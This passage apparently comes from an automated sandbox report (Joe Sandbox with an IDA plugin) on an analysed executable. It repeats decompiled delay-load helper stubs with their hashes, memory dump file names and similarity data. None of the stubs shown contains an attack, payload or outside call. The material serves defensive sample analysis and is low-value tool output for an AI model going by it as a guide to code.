                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 9b0a807fe99f73acc61739f36ffbc8d29867c4ca39302e73ab4e584bc4a33d56
                                                    • Instruction ID: 210b3209b2953e72bdbdd12cac448a4a65eb3f3fd426ae025972661f6a2b3680
                                                    • Opcode Fuzzy Hash: 9b0a807fe99f73acc61739f36ffbc8d29867c4ca39302e73ab4e584bc4a33d56
                                                    • Instruction Fuzzy Hash: C3B012D136D184AC3148710A2D02C3B014DC4C0B28330403FFA06C83C1D8406C003432
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CDE20A Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00CDE20A() {

				E00CDE85D(0xcfc5ec, 0xd23154); // executed
				goto __eax;
			}



                                                    0x00cde1e3
                                                    0x00cde1ea

                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 6fe332f775f78c316459fb0f381aeb5e4f65943928d1c048e8e98da8e42a8974
                                                    • Instruction ID: 68ad2d26d515abfb1113df245f46af68b0835b7b5727121a69d5c06e92129b8b
                                                    • Opcode Fuzzy Hash: 6fe332f775f78c316459fb0f381aeb5e4f65943928d1c048e8e98da8e42a8974
                                                    • Instruction Fuzzy Hash: 2FB012D135C244AC3144720A2E03C3B010CC0C0B28330803FFA09C83C1DC506D093432
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CDE200 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00CDE200() {

				E00CDE85D(0xcfc5ec, 0xd23158); // executed
				goto __eax;
			}



                                                    0x00cde1e3
                                                    0x00cde1ea

                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 0aabf1a1c02b1548eecf371448ec7427db45bc83bd4bd54495d9f6cc9384b4ec
                                                    • Instruction ID: f8ebe13bf0437518e251044e75e4b4b1b74865359203979adcbfb7aa4e50f3a9
                                                    • Opcode Fuzzy Hash: 0aabf1a1c02b1548eecf371448ec7427db45bc83bd4bd54495d9f6cc9384b4ec
                                                    • Instruction Fuzzy Hash: FEB012D135C384BC3184720A2D02C3B010CC0C0B28330813FFA09C83C1D8406C443432
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CDE21E Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00CDE21E() {

				E00CDE85D(0xcfc5ec, 0xd2314c); // executed
				goto __eax;
			}



                                                    0x00cde1e3
                                                    0x00cde1ea

                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 1f7e45597f410a824fe515aab3793a03a91d7978a12a73a25e59963e19e70a16
                                                    • Instruction ID: 9112c38e77f2fb4c07a1a76bc15033dd5e2476c56a0965dca6cc3b7b70000c7e
                                                    • Opcode Fuzzy Hash: 1f7e45597f410a824fe515aab3793a03a91d7978a12a73a25e59963e19e70a16
                                                    • Instruction Fuzzy Hash: 8DB012E135C144BC3144710A2D02C3B010CC0C1F28330803FFF05C83C1D840AD003432
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CDE228 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00CDE228() {

				E00CDE85D(0xcfc5ec, 0xd23148); // executed
				goto __eax;
			}



                                                    0x00cde1e3
                                                    0x00cde1ea

                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 9d1e642c10aa7c52aa2caebf3fa59e3ecf85e7e388b990e41eba3333f49f4f41
                                                    • Instruction ID: 365084fa6e0ffa1b7dfce38b91089cf8a259de41ceb4874cd3a6bddbee0dc96b
                                                    • Opcode Fuzzy Hash: 9d1e642c10aa7c52aa2caebf3fa59e3ecf85e7e388b990e41eba3333f49f4f41
                                                    • Instruction Fuzzy Hash: 52B012E135C284BC3184710A2D02C3B010CC0C0F28330413FFB05C83C1D8406D403432
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CDE23C Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00CDE23C() {

				E00CDE85D(0xcfc5ec, 0xd23140); // executed
				goto __eax;
			}



                                                    0x00cde1e3
                                                    0x00cde1ea

                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: fc85c0fb370c59429e5b94ca7b32f107a7adf4fdf6e42cc7bbb8b021aabaef28
                                                    • Instruction ID: fcba007005f39ee154801e917e945b133638c910280025ad19bed176dec55e33
                                                    • Opcode Fuzzy Hash: fc85c0fb370c59429e5b94ca7b32f107a7adf4fdf6e42cc7bbb8b021aabaef28
                                                    • Instruction Fuzzy Hash: 7DB012E135C144AC3144710B2D02C3B010CC0C0F28330403FFB05C83C1D8406D003432
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CDE232 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00CDE232() {

				E00CDE85D(0xcfc5ec, 0xd23144); // executed
				goto __eax;
			}



                                                    0x00cde1e3
                                                    0x00cde1ea

                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: ed53e56fe1431cf1d1efcabd085c7e90cdd664511b77a18183d88fd946068231
                                                    • Instruction ID: 04cbd5e43457d847bde3d88b7d63d3b2372b01470eb145ab9c97750e7810127d
                                                    • Opcode Fuzzy Hash: ed53e56fe1431cf1d1efcabd085c7e90cdd664511b77a18183d88fd946068231
                                                    • Instruction Fuzzy Hash: 08B012E135C144AC3144710A2E03C3B010CC0C0F28330403FFB05C83C1DC406E013432
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CDE44B Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00CDE44B() {

				E00CDE85D(0xcfc60c, 0xd2305c); // executed
				goto __eax;
			}



                                                    0x00cde3fc
                                                    0x00cde403

                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE3FC
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: ba6fc128ba983f12c0fb80883a90407a66f1f5df8c9b8785b49ed913924573fa
                                                    • Instruction ID: 0dd66c898d7a7d38e083d22871dabd9da1c95a6f9295d7440b493458543b6859
                                                    • Opcode Fuzzy Hash: ba6fc128ba983f12c0fb80883a90407a66f1f5df8c9b8785b49ed913924573fa
                                                    • Instruction Fuzzy Hash: 45B012E139C154BC3244B1092E02C37024CC5C0B14330C03FFB04C93C0D8404C042433
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CDE419 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00CDE419() {

				E00CDE85D(0xcfc60c, 0xd23054); // executed
				goto __eax;
			}



                                                    0x00cde3fc
                                                    0x00cde403

                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE3FC
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 4c5be4f876e6dd869f7ca1f8ebe5acc3f8a0f13c07e3eb9059652928c42c280d
                                                    • Instruction ID: 0f9f964a9eaeead3f30d1b09614bf2daa097ae9cd16a2bb46b52704b6c9b14ef
                                                    • Opcode Fuzzy Hash: 4c5be4f876e6dd869f7ca1f8ebe5acc3f8a0f13c07e3eb9059652928c42c280d
                                                    • Instruction Fuzzy Hash: 2AB012E139C1547C324471092F02C37024CC4C0B14330C03FF704D93C0D8400C092433
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CDE423 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00CDE423() {

				E00CDE85D(0xcfc60c, 0xd2304c); // executed
				goto __eax;
			}



                                                    0x00cde3fc
                                                    0x00cde403

                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE3FC
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 6aa7e65921fb1b63189c2dfc53e026387ac1ada2381d0825eba352d89b8ef1eb
                                                    • Instruction ID: 6aa3e0472f04e0bc3b12ce9d487fc5b8bf1f68f8a2c592f478a55009a72c2b3e
                                                    • Opcode Fuzzy Hash: 6aa7e65921fb1b63189c2dfc53e026387ac1ada2381d0825eba352d89b8ef1eb
                                                    • Instruction Fuzzy Hash: 8AB012F139C054BC3244B1096E02C37024CC5C0F14330803FFB04C93C0D8444E002433
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CDE593 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00CDE593() {

				E00CDE85D(0xcfc68c, 0xd23180); // executed
				goto __eax;
			}



                                                    0x00cde580
                                                    0x00cde587

                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE580
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 1cf095dc4cbb5516949d570e6a1714b7e1e530dd1c745c1666b3221942f26ca9
                                                    • Instruction ID: 51b04d439dc282cd60ec641f6f5472eaec988e42e98ea4f9f6030bf7e587a752
                                                    • Opcode Fuzzy Hash: 1cf095dc4cbb5516949d570e6a1714b7e1e530dd1c745c1666b3221942f26ca9
                                                    • Instruction Fuzzy Hash: BCB012C135C1587E3144B25A3D42C37011CC4C0B19330413FF604C93C0F8400C102432
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CDE5A7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00CDE5A7() {

				E00CDE85D(0xcfc68c, 0xd23174); // executed
				goto __eax;
			}



                                                    0x00cde580
                                                    0x00cde587

                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE580
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: a84cab41a747518621d55c943807c77346fda26ddb2d15eaa9bff7671fe3de31
                                                    • Instruction ID: 026f5336c5e159d15af7b1c95a0cdd375be9ed83bc01ae4dc7e5b43bd6cbf941
                                                    • Opcode Fuzzy Hash: a84cab41a747518621d55c943807c77346fda26ddb2d15eaa9bff7671fe3de31
                                                    • Instruction Fuzzy Hash: 20B012C175C1547C3144B15A7E43C37012CC4D0B19330423FF604C93C0FC400D112432
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CDE5B1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00CDE5B1() {

				E00CDE85D(0xcfc68c, 0xd23178); // executed
				goto __eax;
			}



                                                    0x00cde580
                                                    0x00cde587

                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE580
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: b89f25a880f37bcb297f3eef057ba75c540da1dfe89b5e344ecb0cb088a9287e
                                                    • Instruction ID: d63a90cb83e5a700623de1a181942a44534b7fa04c82cc622b8972d2e63a435b
                                                    • Opcode Fuzzy Hash: b89f25a880f37bcb297f3eef057ba75c540da1dfe89b5e344ecb0cb088a9287e
                                                    • Instruction Fuzzy Hash: 95B012C135C2547C3184B15A7D43C37012CC4D0B19330423FF604C93C0F8400C502432
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CDE546 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00CDE546() {

				E00CDE85D(0xcfc66c, 0xd23078); // executed
				goto __eax;
			}



                                                    0x00cde51f
                                                    0x00cde526

                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE51F
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
